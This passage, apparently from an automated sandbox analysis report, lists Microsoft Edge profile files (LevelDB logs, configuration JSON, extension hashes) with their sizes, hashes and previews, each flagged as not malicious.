                                                                                                                                                                                                                                                                                                SHA-512:15751FB96C13B9511496BE9379453B5DA60AB1B63046FE647D5BA02B9D161D99B6A49CE4934AF439A14F11643851B42A880637C20BD12FC51112BB963E313DB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1~Nf.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379149898823010..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.130425150222397
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Pn605RoM1N723oH+Tcwtk2WwnvB2KLl1nnpMq2PN723oH+Tcwtk2WwnvIFUv:SfsaYebkxwnvFLpMvVaYebkxwnQFUv
                                                                                                                                                                                                                                                                                                MD5:673E399D95D314106680EE64DD446416
                                                                                                                                                                                                                                                                                                SHA1:040295E871D19F0EAB694225807CE5A4CA5760F1
                                                                                                                                                                                                                                                                                                SHA-256:7C0A577ADBCE503D42C4CEF4C8BFC9A3C2D3E59044FE9A9CC2F9C7453C3D0AF2
                                                                                                                                                                                                                                                                                                SHA-512:6D802FCFF27223E79666A220679CF55ADE911F426617641F756803DEC5750BDEAAED0CB4B828AC07D732872B4038F944F758E9B7E50FF41D41D8708410B7199D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:36.059 20f4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/20-01:31:36.192 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3246138696969805
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfvb
                                                                                                                                                                                                                                                                                                MD5:82C32DAA7BF65D4CD2A81E6AD6D09DFE
                                                                                                                                                                                                                                                                                                SHA1:0A3E0A05DE9FE51E184075A395A01105856DCFD0
                                                                                                                                                                                                                                                                                                SHA-256:30DFAD051336C38F9DC743C87547AB99A7BFE9B9D6E606A4DBAE30073CC7A9A4
                                                                                                                                                                                                                                                                                                SHA-512:02CD59DB8CAE7DB0BDB7077D4D85BAAEC8A4B4CC08753E442A3091F2C394BC5F145568E8E167C9155299E2A286F03489597DC70E0003BC9669B53C7D43BB37E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.145492980879725
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFsON+q2PN723oH+Tcwt8aPrqIFUt8IFuZmw+IWVFURVkwON723oH+Tcwt8amLJ:NsOIvVaYebL3FUt8cu/+Tu5OaYebQJ
                                                                                                                                                                                                                                                                                                MD5:BA241B233CB6FD4D4CE6EFD9DD913C32
                                                                                                                                                                                                                                                                                                SHA1:6610E84CD6D412C2294FA788135DF1AD75845839
                                                                                                                                                                                                                                                                                                SHA-256:7CC2084827BA1A93170DDE7F47EEBF9F78264FEFD819541C2CCF1EBFF3693D32
                                                                                                                                                                                                                                                                                                SHA-512:D48D1517294B7629A9425A1D5115F32A15D638563E7934F9EA8653C2D68A804DC2FEBD6A512E666F006BE3763C08085B540884EB8F9C3A8A2C0A178104400AA7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.396 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/20-01:31:31.397 1538 Recovering log #3.2024/12/20-01:31:31.400 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.141999661671637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PFN+q2PN723oH+Tcwt865IFUt8IUXBXZmw+IUTmNVkwON723oH+Tcwt86+ULJ:mvVaYeb/WFUt8zd/+zTmz5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                MD5:787C374F89B39BC87F96464FF8037CB5
                                                                                                                                                                                                                                                                                                SHA1:32F63B4CA60E97B47D176601473E7060DA93CA52
                                                                                                                                                                                                                                                                                                SHA-256:AA6CCC2D78DF3BAEAB9249E4592D23D18C423420277FC2714E2E3E0E8DF5CE52
                                                                                                                                                                                                                                                                                                SHA-512:06C26F183797DCAF43FE6854E856967DFB640020EB7606C979E8BCE53AA1D439DAE32338EB93A4CD66E1B5E4ABE137B59F34C729F2E3929A5C5A003410AB52AE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.419 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/20-01:31:31.423 1538 Recovering log #3.2024/12/20-01:31:31.426 1538 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):325
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.102840696919073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7ly4q2PN723oH+Tcwt8NIFUt8I7lyJZmw+I7lyDkwON723oH+Tcwt8+eLJ:JRvVaYebpFUt8UM/+Us5OaYebqJ
                                                                                                                                                                                                                                                                                                MD5:0DB18570E643A357484EF996622443C3
                                                                                                                                                                                                                                                                                                SHA1:B99E3C6FED280C89C7410AF5B3990C711C79BE35
                                                                                                                                                                                                                                                                                                SHA-256:3B04613DBD747F70005D6F2325ECC71B96807AEFBD17BD2CE3C33AA5BA9B1300
                                                                                                                                                                                                                                                                                                SHA-512:78685BAA1D6C431B4842B5A8B562379E7A3F413EDA4E2F552C85CF5F1756FAACC0EB8BC7D5D2B53D2BE71DEA033BD11DE712E661129DF00A6D79FCCCADE94CA8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.217 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-01:31:32.217 650 Recovering log #3.2024/12/20-01:31:32.217 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):325
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.102840696919073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7ly4q2PN723oH+Tcwt8NIFUt8I7lyJZmw+I7lyDkwON723oH+Tcwt8+eLJ:JRvVaYebpFUt8UM/+Us5OaYebqJ
                                                                                                                                                                                                                                                                                                MD5:0DB18570E643A357484EF996622443C3
                                                                                                                                                                                                                                                                                                SHA1:B99E3C6FED280C89C7410AF5B3990C711C79BE35
                                                                                                                                                                                                                                                                                                SHA-256:3B04613DBD747F70005D6F2325ECC71B96807AEFBD17BD2CE3C33AA5BA9B1300
                                                                                                                                                                                                                                                                                                SHA-512:78685BAA1D6C431B4842B5A8B562379E7A3F413EDA4E2F552C85CF5F1756FAACC0EB8BC7D5D2B53D2BE71DEA033BD11DE712E661129DF00A6D79FCCCADE94CA8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.217 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/20-01:31:32.217 650 Recovering log #3.2024/12/20-01:31:32.217 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:c3/l7ntFlljq7A/mhWJFuQ3yy7IOWUsd4/dweytllrE9SFcTp4AGbNCV9RUIn:cPK75fOO2/d0Xi99pEYJ
                                                                                                                                                                                                                                                                                                MD5:F59BB4C98EDB34283601B3941E95EEE8
                                                                                                                                                                                                                                                                                                SHA1:F9FAAE2FF1075172E76541DEACCF0C8371084E0D
                                                                                                                                                                                                                                                                                                SHA-256:085B4FD994BDD4392CB7860C8B369BF5CC63BB67DB3C4805B6BD0B795341199D
                                                                                                                                                                                                                                                                                                SHA-512:D8F2F1C18E4631652F4ECA6180269FF12B144FA0839C8FED6D28BF41916744A2911AD8DDED2F63898FC99A20ED3152293C7F26CC55B1B235DEF3DF581A0631CE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.647848568592449
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:aj9P07QkQerGjlt773pL1gam6I6P/KbtlcqRKToaADhf:adqe2clt7iKP/XqRKc39
                                                                                                                                                                                                                                                                                                MD5:A6209C9A931EDE8583EDD00022EE5200
                                                                                                                                                                                                                                                                                                SHA1:7E4F98EC98042DBD06B07DF60F67A994AF07D1A6
                                                                                                                                                                                                                                                                                                SHA-256:F82CDF6F2F2A3B733E629B928775DFAB40B25F4B25E62F9B785B0FA85E71CC30
                                                                                                                                                                                                                                                                                                SHA-512:95B0534FC3622A59AD694469A592F4EF7038541B9C41557AA1CE1BD3F2D5180CAD78D5B2AE44A28A8EF7424702BF0EE1790951E4F4BC1889145804C094C6E8D9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):409
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2687467808755555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:FsO4vVaYeb8rcHEZrELFUt86s4J/+6s4D5OaYeb8rcHEZrEZSJ:FeVaYeb8nZrExg86VTVVOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:55F63690315B5575A052496E6DDB87C2
                                                                                                                                                                                                                                                                                                SHA1:D57C87DB04260F6DD46517262BEE9A64424DD278
                                                                                                                                                                                                                                                                                                SHA-256:C0462AB7F90D8EE3E71208ED977BED036A64A35A433DDA7D3FC8480CEEA7F606
                                                                                                                                                                                                                                                                                                SHA-512:D569CE15865D3E452DBDDAD2F45F6D4D04440CFAF58524F965A4E0575FE6FB9BDD107E8BBCF3E0377B3E166C93FCF1CE8CDF15FCAE243AE4B1F85A2E2BBC3348
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:34.980 650 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/20-01:31:34.982 650 Recovering log #3.2024/12/20-01:31:34.982 650 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1657
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.6334244970904335
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:xtZ67tntaOk2KcXZ1bV03Sx4Lyls5BAyPK7AHHk2GJ341:xtQFJQGTD2osZdP1
                                                                                                                                                                                                                                                                                                MD5:834FFE60531A5F2598750EC0D2A8480A
                                                                                                                                                                                                                                                                                                SHA1:22FC38AB4C8F6CEB8C34A88187196E7525FBF917
                                                                                                                                                                                                                                                                                                SHA-256:8A5E8B56EBE78CBBEA159F2507F176AE1A434AD0CB4FFD567D4289100143E61A
                                                                                                                                                                                                                                                                                                SHA-512:5427FD247FA94D4C8984365808656A74F925AB14A80D2A30217E662F038D6195AF9B7F035729EA8A9E2544E0D85DD0F9D434EE398FD4273E5D2C14BC051B74EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..c6................VERSION.1..META:https://ntp.msn.com..............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":771}.!_https://ntp.msn.com..LastKnownPV..1734676308105.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734676309068.._https://ntp.msn.com..MUID!.015EFEE8056263FB2030EBB304006296.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734676308183,"schedule":[-1,22,-1,-1,-1,9,27],"scheduleFixed":[-1,22,-1,-1,-1,9,27],"simpleSchedule":[41,42,9,13,12,44,43]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734676308074.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241219.380"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):340
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.163183831487284
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PywiFlyq2PN723oH+Tcwt8a2jMGIFUt8IyJU1Zmw+I+AlRkwON723oH+Tcwt8a23:1iFlyvVaYeb8EFUt8zK/+8lR5OaYeb8N
                                                                                                                                                                                                                                                                                                MD5:F4ED23379AB5BECED9D41FD12DB17F7F
                                                                                                                                                                                                                                                                                                SHA1:1D1BD6296BED03F2D01D7D7CE6F939E55EAA166C
                                                                                                                                                                                                                                                                                                SHA-256:D7F170C86D3756E405EF0720E93F478C6FFB4FFA4403B4D620E7693F8BEFC98A
                                                                                                                                                                                                                                                                                                SHA-512:C5F6120DA755007EB6482F1331A34131D27793C31B580E1611A5F2205A8290F544616D7EA96012152F7FECE582496F87ED06EB13730FE3A8CB0F577B19CC6902
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.885 1c74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-01:31:31.886 1c74 Recovering log #3.2024/12/20-01:31:31.897 1c74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1452
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                Encrypted:false
